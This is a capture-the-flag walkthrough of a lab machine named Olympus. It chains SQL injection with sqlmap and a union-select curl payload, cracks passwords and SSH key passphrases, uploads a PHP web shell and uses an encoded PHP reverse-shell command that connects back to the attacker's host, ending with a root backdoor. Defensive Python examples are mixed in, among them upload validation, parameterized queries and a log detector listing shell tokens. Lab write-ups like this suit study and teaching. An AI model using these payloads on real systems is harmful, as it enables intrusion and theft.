Olympus

Target IP: 10.10.83.153


I added the entry 10.10.83.153 olympus.thm to /etc/hosts, and now we are ready to go!

Scanning

[screenshots: port scan]

Only two ports are open on the machine: SSH and HTTP. I will start my enumeration with HTTP.


Enumeration

Port 80: HTTP

[screenshot]
Heading to olympus.thm shows us the webpage above. There is a hint: "The old version of the website is still accessible on this domain." Viewing the source code of this page did not provide any useful information. Time for a directory search!

[screenshot]
A simple directory search gives us plenty of information. The result /~webmaster looks interesting.

[screenshot]
The webpage above is displayed when we browse to this directory. It looks like this is the first version of the website.

[screenshot]
Viewing the source code, the webpage mentions it is Simple Content Management System by Victor Alagwu. A Google search shows this application version is vulnerable to SQL injection. It also seems the old website uses a parameter for the categories of topics. This parameter could be vulnerable.

[screenshot]
According to sqlmap, the cat_id parameter is vulnerable. I used the command sqlmap -u "http://olympus.thm/~webmaster/category.php?cat_id=1" --dump to dump all the tables.

[screenshot]
By dumping the contents of the tables, I got a bunch of useful information. The interesting part is that prometheus is not using a randsalt (random salt) for their password.

[screenshot]
I copied the password hash of each user into a text file called hash.

[screenshot]
Then I used john to crack the hashes. It managed to crack the hash of one user, possibly prometheus. Now we have the credential prometheus:summertime, which we can spray at the old website's login page and at SSH.
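The reason the unsalted hash mattered, as an added example that is not part of this write-up: with no salt, two users who chose the same password get the same stored hash, so one crack exposes both, and a defender can spot such reuse directly in the table. The block below contrasts that with salted, iterated PBKDF2 storage, which is what the CMS should have used. The hash algorithm (SHA-256), the extra usernames and the rows themselves are constructed assumptions; only prometheus and the cracked password summertime come from the write-up.

```python
import hashlib
import hmac
import os
from collections import defaultdict
from typing import Optional


def unsalted_hash(password: str) -> str:
    """Storage as seen in the dump: hash(password) with no salt. The same
    password always yields the same digest. SHA-256 is an assumption here;
    the write-up does not name the real algorithm."""
    return hashlib.sha256(password.encode()).hexdigest()


def find_shared_passwords(rows):
    """rows: iterable of (username, unsalted_hash). Returns {hash: [users]}
    for every digest shared by more than one user: cracking one cracks all."""
    groups = defaultdict(list)
    for user, digest in rows:
        groups[digest].append(user)
    return {d: users for d, users in groups.items() if len(users) > 1}


# Salted, slow storage: a fresh random salt per user plus many PBKDF2 rounds.
PBKDF2_ITERATIONS = 600_000  # OWASP's figure for PBKDF2-HMAC-SHA256


def hash_password(password: str, salt: Optional[bytes] = None) -> str:
    """Return a self-describing 'algo$iterations$salt$digest' string."""
    salt = salt if salt is not None else os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ITERATIONS)
    return f"pbkdf2_sha256${PBKDF2_ITERATIONS}${salt.hex()}${dk.hex()}"


def verify_password(password: str, stored: str) -> bool:
    """Recompute with the stored salt and iteration count; constant-time compare."""
    try:
        algo, iterations, salt_hex, dk_hex = stored.split("$")
    except ValueError:
        return False
    if algo != "pbkdf2_sha256":
        return False
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(dk.hex(), dk_hex)


# Constructed rows: prometheus's cracked password from the write-up plus two
# made-up users, one of which reuses the same password.
SAMPLE_ROWS = [
    ("prometheus", unsalted_hash("summertime")),
    ("constructed_user", unsalted_hash("summertime")),
    ("constructed_other", unsalted_hash("not-the-same")),
]

if __name__ == "__main__":
    print("shared:", find_shared_passwords(SAMPLE_ROWS))
    stored = hash_password("summertime")
    print(stored)
    print("verify:", verify_password("summertime", stored))
```

Run against a real dump, find_shared_passwords is the quick triage: every group it returns is a set of accounts that fall together as soon as any one of them is cracked. Hashing the same password twice with hash_password gives two different strings because the salt differs, which is exactly the property the unsalted table lacked.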

[screenshot]
The credential above worked for the admin page of the old website. However, the users page shows that prometheus only has the User role, and we need to obtain admin privileges. We have the option to create a new user, but we are unable to log in as them.

[screenshot]
It looks like we can change the profile picture for our account. Maybe we can use a file upload exploit? When the Browse... button is pressed, it shows that all formats are accepted. Uploading a PHP file is also accepted (wtf)? The next step is to find out where our profile picture is stored. It looks like it gets stored in the /img/<name> directory. The only problem is that we need admin privileges to access our backdoor.
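The check the profile-picture upload should have performed, as an added example that is not the CMS's own code: allowlist the extension, confirm the file really starts with the magic bytes of that image type, refuse anything containing a PHP open tag, and never store the file under the user-supplied name. The magic-byte table, the helper names and the sample uploads are constructed for this example.

```python
import os
import secrets
from typing import Tuple

ALLOWED_EXT = {".png", ".jpg", ".jpeg", ".gif"}

# Leading bytes of each allowed format (constructed table of well-known signatures).
MAGIC = {
    ".png": [b"\x89PNG\r\n\x1a\n"],
    ".jpg": [b"\xff\xd8\xff"],
    ".jpeg": [b"\xff\xd8\xff"],
    ".gif": [b"GIF87a", b"GIF89a"],
}


def validate_profile_picture(filename: str, data: bytes) -> Tuple[bool, str]:
    """Return (ok, reason). Accept only a genuine image of an allowed type."""
    # Drop any directory part the client put in the name ("../../x.png").
    base = os.path.basename(filename)
    # Only the final extension counts; "shell.php.png" still ends in .png,
    # so the content checks below are what actually protect the server.
    ext = os.path.splitext(base)[1].lower()
    if ext not in ALLOWED_EXT:
        return False, f"extension {ext!r} not allowed"
    if not any(data.startswith(sig) for sig in MAGIC[ext]):
        return False, "content does not match the declared image type"
    # A valid image header followed by PHP is still dangerous if the upload
    # directory ever executes scripts, so reject embedded open tags outright.
    if b"<?php" in data or b"<?=" in data:
        return False, "embedded PHP open tag"
    return True, "ok"


def safe_storage_name(filename: str) -> str:
    """Random server-chosen name keeping only the (already validated) extension,
    so the stored path is never attacker-controlled."""
    ext = os.path.splitext(os.path.basename(filename))[1].lower()
    return secrets.token_hex(16) + ext


# Constructed sample uploads.
PNG_OK = b"\x89PNG\r\n\x1a\n" + b"\x00" * 32
PHP_FILE = b"<?php echo 'x'; ?>"
POLYGLOT = b"\x89PNG\r\n\x1a\n" + b"<?php echo 'x'; ?>"

if __name__ == "__main__":
    for name, body in [("avatar.png", PNG_OK), ("shell.php", PHP_FILE),
                       ("avatar.png", POLYGLOT), ("avatar.php.png", PHP_FILE)]:
        print(name, validate_profile_picture(name, body))
```

Validation alone is not the whole fix: the upload directory should also be served with script execution disabled, so that even a file that slips through is returned as bytes rather than run.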

[screenshots]
I added another virtual host called chat.olympus.thm.

[screenshot]
After performing a directory search on the new virtual host, I gained more information. /uploads is interesting because chat information is stored in this directory. From the database dump above, there was an interesting file called 47c3210d51761686f3af40a875eeaaea.txt.

[screenshot]
But this file shows nothing useful.

[screenshot]
Using the command curl http://olympus.thm/~webmaster/search.php -d "search=' union select 1,2,group_concat(file),4,5,6,7,8,9,10 from chats-- -&submit=", I was able to list the uploaded files.
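Both injection points in this write-up (cat_id in category.php and the search field of search.php) share one root cause: user input spliced into the SQL text. The block below is an added example, not the CMS's code, that rebuilds a search query both ways over an in-memory SQLite database and runs the write-up's union payload through each. The schema is constructed and smaller than the real one (three columns instead of ten, so the payload is adjusted accordingly); the chats.file name is the one from the dump, the second one is made up.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed schema: a small 'posts' table the search runs over and the
    'chats' table whose 'file' column the write-up extracted."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE posts (id INTEGER, title TEXT, body TEXT);
        INSERT INTO posts VALUES (1, 'Welcome', 'Hello Olympus');
        CREATE TABLE chats (id INTEGER, file TEXT);
        INSERT INTO chats VALUES (1, '47c3210d51761686f3af40a875eeaaea.txt');
        INSERT INTO chats VALUES (2, 'constructed_upload.php');
    """)
    return con


def search_vulnerable(con: sqlite3.Connection, term: str):
    """Input concatenated into the SQL text, the pattern behind search.php and
    category.php: quotes and keywords in 'term' become part of the statement."""
    sql = "SELECT id, title, body FROM posts WHERE title LIKE '%" + term + "%'"
    return con.execute(sql).fetchall()


def search_safe(con: sqlite3.Connection, term: str):
    """Bound parameter: the driver passes 'term' as a value, never as SQL,
    so the same payload is merely a search string that matches nothing."""
    sql = "SELECT id, title, body FROM posts WHERE title LIKE ?"
    return con.execute(sql, ("%" + term + "%",)).fetchall()


# The write-up's payload adapted to this 3-column schema (the real search had 10).
PAYLOAD = "' union select 1,group_concat(file),3 from chats-- -"


def leaked_files(rows) -> set:
    """Collect every chats.file name that appears anywhere in a result set."""
    names = set()
    for row in rows:
        for cell in row:
            if isinstance(cell, str):
                for part in cell.split(","):
                    if part.endswith((".txt", ".php")):
                        names.add(part)
    return names


if __name__ == "__main__":
    con = make_db()
    print("vulnerable:", search_vulnerable(con, PAYLOAD))
    print("leaked:", leaked_files(search_vulnerable(con, PAYLOAD)))
    print("safe:", search_safe(con, PAYLOAD))
```

The vulnerable variant returns the chats.file column alongside the real search results because the closing quote and the trailing comment rewrite the statement; the parameterized variant returns nothing for the same input, which is the behaviour sqlmap would report as not injectable.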

[screenshot]
And I was able to access my simple web shell.


Exploitation

[screenshot]
Now I have a simple web shell. I leveraged it to gain a reverse shell connection: I used the PHP payload below and visited the URL to trigger it. Now I have a foothold on the machine.
Payload used: php%20-r%20%27%24sock%3Dfsockopen%28%2210.14.55.153%22%2C8443%29%3Bshell_exec%28%22%2Fbin%2Fbash%20%3C%263%20%3E%263%202%3E%263%22%29%3B%27
Full URL: http://chat.olympus.thm/uploads/3573b47dffe7988a0b3e548986a5b3ab.php?cmd=php%20-r%20%27%24sock%3Dfsockopen%28%2210.14.55.153%22%2C8443%29%3Bshell_exec%28%22%2Fbin%2Fbash%20%3C%263%20%3E%263%202%3E%263%22%29%3B%27

My machine timed out, so the new full URL is http://chat.olympus.thm/uploads/03c049b49938dbe1761d94312d63f02f.php?cmd=php%20-r%20%27%24sock%3Dfsockopen%28%2210.14.55.153%22%2C8443%29%3Bshell_exec%28%22%2Fbin%2Fbash%20%3C%263%20%3E%263%202%3E%263%22%29%3B%27


Privilege Escalation

The machine's new IP is 10.10.56.116.

[screenshots]
There is an unusual binary called cputils. Running it lets us copy a file from a source to a destination.

[screenshot]
It looks like zeus has a key in .ssh.

[screenshot]
Now I have the SSH key of user zeus.

[screenshot]
However, it asks for a passphrase.

[screenshot]
I used ssh2john to obtain a hash of the key, and then cracked the passphrase with john. Now I can log in as the user zeus. The passphrase is snowflake.

[screenshot]
And I am in as zeus.

[screenshot]
During further manual enumeration, I found an interesting file that looks like a backdoor with a password inside it. Therefore, the backdoor should be reachable at 0aB44fdS3eDnLkpsz3deGv8TttR4sc/VIGQFQFMYOST.php.

[screenshot]
And it did! I used the password inside the PHP file to gain access. This is a backdoor that gives us root privileges. The command syntax is already there too!

[screenshot]
Using the secret backdoor, I managed to obtain a root shell!
The command I used is http://10.10.56.116/0aB44fdS3eDnLkpsz3deGv8TttR4sc/VIGQFQFMYOST.php?ip=10.14.55.153&port=8444, pointing it at my local machine and port. I had to enter the password again.
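Seen from the web server's side, the foothold (a PHP file under /uploads called with ?cmd=) and the root backdoor (a PHP script called with ?ip=&port=) both leave distinctive lines in the access log. The block below is an added example, not part of the write-up, of detection logic a defender could run over such a log: it parses common-format lines, percent-decodes the query string, and flags scripts executed from the uploads directory, shell or connect-back commands in a cmd parameter, connect-back ip/port parameters to a PHP script, and union/sleep-style SQL injection probes in any parameter. The log lines are constructed (timestamps and sizes made up); the paths and query strings are the ones recorded in this write-up, plus one constructed union probe and one benign request.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Common log format prefix: client IP, identd, user, [timestamp], "request", status, size.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<url>\S+) \S+" (?P<status>\d{3}) \S+'
)

# Tokens that mark a shell-spawning or connect-back command inside a parameter.
SHELL_TOKENS = ("fsockopen", "/bin/bash", "/bin/sh", "/dev/tcp", "bash -i", "sh -i", "nc -e")


def analyse_request(line: str):
    """Return (client_ip, path, findings) for one log line, or None if it does
    not parse. findings is an empty list for requests that look benign."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("url"))
    params = parse_qs(parts.query, keep_blank_values=True)  # percent-decodes values
    findings = []
    if parts.path.startswith("/uploads/") and parts.path.endswith(".php"):
        findings.append("php script executed from the uploads directory")
    for name, values in params.items():
        for value in values:
            low = value.lower()
            if name == "cmd":
                if any(tok in low for tok in SHELL_TOKENS):
                    findings.append("shell/connect-back command in cmd parameter")
                else:
                    findings.append("cmd parameter present")
            if ("union" in low and "select" in low) or "sleep(" in low or "' or " in low:
                findings.append(f"sql injection probe in parameter {name}")
    if "ip" in params and "port" in params and parts.path.endswith(".php"):
        findings.append("ip/port parameters to a php script (connect-back backdoor pattern)")
    return m.group("ip"), parts.path, findings


def scan(lines):
    """Return the analysed entries that carry at least one finding, in log order."""
    alerts = []
    for line in lines:
        result = analyse_request(line)
        if result and result[2]:
            alerts.append(result)
    return alerts


# Constructed log lines; paths and query strings follow the write-up.
SAMPLE_LOG = [
    '10.14.55.153 - - [01/Jan/2024:12:00:00 +0000] "GET /uploads/3573b47dffe7988a0b3e548986a5b3ab.php?cmd=php%20-r%20%27%24sock%3Dfsockopen%28%2210.14.55.153%22%2C8443%29%3Bshell_exec%28%22%2Fbin%2Fbash%20%3C%263%20%3E%263%202%3E%263%22%29%3B%27 HTTP/1.1" 200 0',
    '10.14.55.153 - - [01/Jan/2024:12:05:00 +0000] "GET /0aB44fdS3eDnLkpsz3deGv8TttR4sc/VIGQFQFMYOST.php?ip=10.14.55.153&port=8444 HTTP/1.1" 200 45',
    '10.14.55.153 - - [01/Jan/2024:11:30:00 +0000] "GET /~webmaster/category.php?cat_id=1%20UNION%20SELECT%201,2,3 HTTP/1.1" 200 3210',
    '10.10.83.1 - - [01/Jan/2024:11:00:00 +0000] "GET /~webmaster/category.php?cat_id=1 HTTP/1.1" 200 3210',
]

if __name__ == "__main__":
    for ip, path, findings in scan(SAMPLE_LOG):
        print(ip, path, "->", "; ".join(findings))
```

The decode step matters: the reverse-shell command in the first line is entirely percent-encoded, so a pattern match on the raw URL would miss fsockopen and /bin/bash. The sqlmap run against cat_id is not in the sample, but it would produce many requests of the third kind from one client in a short window, which is the rate signal to alert on alongside the content signal shown here.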


Flags

[screenshot]
Using sqlmap, I dumped the table olympus.flag, which contains the first flag.

[screenshot]
I obtained the second flag inside zeus's home directory.

[screenshot]
I read the root.txt flag once I had used the secret backdoor to gain a reverse shell connection.

[screenshot]
The fourth flag requires us to search for it. grep -r flag{ should be enough to find the last flag file.

[screenshot]
The last flag is located at /etc/ssl/private/.bonus.fl4g and reads flag{Y0u_G0t_m3_g00d!}.